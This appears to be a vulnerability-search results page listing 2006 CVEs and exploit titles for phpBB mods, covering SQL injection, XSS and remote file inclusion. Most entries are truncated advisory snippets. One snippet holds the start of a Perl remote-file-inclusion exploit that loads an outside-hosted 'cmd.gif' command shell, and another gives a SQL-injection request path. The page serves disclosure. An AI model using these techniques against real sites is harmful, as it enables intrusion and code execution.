2972 matches found
CVE-2006-2359
Cross-site scripting XSS vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection...
Sql injection
SQL injection vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2006-2359
XSS vulnerability CVE-2006-2359 affects the phpBB Chart mod (charts.php) via the id parameter. The issue allows remote attackers to inject arbitrary script/HTML, with the note that it may stem from SQL injection. Base metrics indicate MEDIUM risk (CVSSv2: AV=N/AC=M/Au=N/C=N/I=P/A=N, base score 4....
phpBB Chart Mod 1.1 - charts.php?id SQL Injection
phpBB Chart Mod 1.1 - charts.php?id SQL Injection source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application t...
phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection
source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...
CVE-2006-2245
PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2006-2245
PHP remote file inclusion vulnerability in auction\auctioncommon.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
Auction 1.3m - phpbb_root_path Remote File Inclusion
Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...
Auction 1.3m - 'phpbb_root_path' Remote File Inclusion
!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...
Remote file inclusion
PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...
CVE-2006-2134
PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...
CVE-2006-2134
PHP remote file inclusion vulnerability in /includes/kbconstants.php in Knowledge Base Mod for PHPbb 2.0.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...
Blog Mod <= 0.2.x SQL Injection
==================== Discovered by: Qex Date: 28 April 2006 ==================== /weblogposting.php?mode=quote&r=SQL&w=1...
Sql injection
SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...
CVE-2006-2127
SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...
CVE-2006-2127
SQL injection vulnerability in weblogposting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter...
CVE-2006-2127
CVE-2006-2127 affects Blog Mod 0.2.x; a SQL injection in weblog_posting.php allows remote attackers to execute arbitrary SQL via the r parameter, with a base risk score of 6.4 (Medium). No explicit remediation or exploit details are provided in the connected documents.
phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion
phpBB Knowledge Base 2.0.2 - Mod KBconstants.php Remote File Inclusion source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An...
phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file...